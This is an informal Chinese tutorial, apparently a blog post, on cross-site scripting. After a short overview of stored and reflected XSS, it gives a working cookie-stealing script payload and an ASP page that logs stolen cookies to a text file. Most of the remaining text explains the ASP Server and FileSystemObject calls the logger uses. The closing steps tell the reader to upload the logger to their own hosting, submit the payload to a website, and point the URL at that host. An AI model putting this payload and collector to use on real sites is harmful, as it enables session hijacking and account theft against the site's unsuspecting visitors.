1.XSS跨站简介
一类是存储型XSS,主要出现在让用户输入数据,供其他浏览此页的用户进行查看的地方,包括留言、评论、博客日志和各类表单等。应用程序从数据库中查询数据,在页面中显示出来,攻击者在相关页面输入恶意的脚本数据后,用户浏览此类页面就可能受到攻击。
另外一类是参数型XSS,主要是将脚本加入URL地址的程序参数里,参数进入程序后在页面直接输出脚本内容,用户点击类似的恶意链接就可能受到攻击。
传统的XSS攻击都是盘算如何盗取客户端COOKIE,然后劫持客户端和WEB服务端的会话,其他还有利用XSS进行网络钓鱼的攻击方法,这类攻击都是针对客户端进行攻击,而近年流行的XSS WORM攻击方式,是通过AJAX技术把恶意的XSS数据感染到每一个用户,可以对WEB服务造成很大的影响,间接实现了对WEB服务端的攻击。
2.用到的代码是
<script>document.location='http://127.0.0.1/1.asp?msg='+document.cookie</script>
我们还要用到一个asp接口
1 <% 2 3 thisfile=Server.MapPath("cookie.txt") 4 5 msg=Request("msg") 6 7 set fs=server.CreateObject("scripting.filesystemobject") 8 9 set thisfile=fs.OpenTextFile(thisfile,8,True,0) 10 11 thisfile.WriteLine("========cookie:"&msg&"=========") 12 13 thisfile.close 14 15 set fs = nothing 16 17 %>
1. server对象
server对象提供对服务器上的方法和属性的访问,其中大多数方法和属性是作为实用程序的功能的,语法格式为:
其中property和method分别表示属性和方法
server对象的方法:
creareobject:创建服务器组件的实例。
execute:执行一个.asp文件
getlasterror:返回一个描述错误条件的asperror对象
htmlencode;将html编码应用到指定的字符串
mappath:将指定的虚拟路径,无论是当前服务器上的绝对路径还是当前页的相对路径,映射为物理路径
transfer:将当前所有的状态信息发送给另一个.asp文件进行处理
urlencode:将url编码规则,包括转移字符,应用到字符串。
2.使用server对象的createobject方法可以创建服务器组件的实例,语法格式如下:
server.mappath(path)
其中参数path指定要映射物理目录的相对或虚拟路径。如果path以一个正斜线(/)或反斜线(\)开始,mappath方法将返回路径时将path视为完整的虚拟路径;如果path不是斜线开始,mappath方法将返回相对于.asp文件已有的路径的路径。
3.filesystemobject主对象。提供对计算机文件系统的访问,包括用来创建,删除,和获得有关信息以及用来操作驱动器,文件夹和文件的方法和属性。
4.要创建一个文本文件并对其进行写操作,首先创建filesystemobject对象实例,然后通过调用该对象的createtextfile方法创建指定文件并返回textstream对象实例,接着使用textstream对象的方法对文件进行写操作并关闭文件
5.打开文件
filesystemobject对象的 opentextfile方法打开指定的文件并返回一个textstream对象,该对象可以用于对文件进行读,写和添加到结尾操作
语法格式
object.opentextfile(file【,iomode【,create【,format】】】)
其中object是必选参数,指定vfilesystemobject对象名称
filename也是必选参数,是一个字符串表达式,用于指定要打开的文件名称。
iomode 是可选参数,用于指定文件的输入,输出模式:如果该参数为1,或省掉,则以只读打开文件,不能写;如果2,只能对其写 不能读,如果为8 则是在文件末尾进行写操作
create是可选参数,取boolean值 指出当指定的filename不存在时是否能创建;如果为TRUE,则可以;如果false或省掉,则不能创建
vformat是可选参数,如果为0 后省掉 则以ascii格式打开文件;如果为-1,以unicode格式打开文件;如果为-2,则以系统默认格式打开文件
6.使用writeline方法向textstream文件写入指定字符串和新字符串,语法
object.writeline(【string】)
其中object是必选参数,指定textstream对象的名称。string是可选参数,指定写入的文件。如果省掉,将向文件新行字符
由于我的电脑没有连网所以就只能用本地做实验 啊
首先 把asp文件传到自己的空间里啊
好 了
再到网站提交数据啊
哦忘记说了
这里写的http://127.0.0.1/1.asp 是你自己传到空间的地址 后面的msg 就是这里的参数
---恢复内容结束---
---恢复内容结束---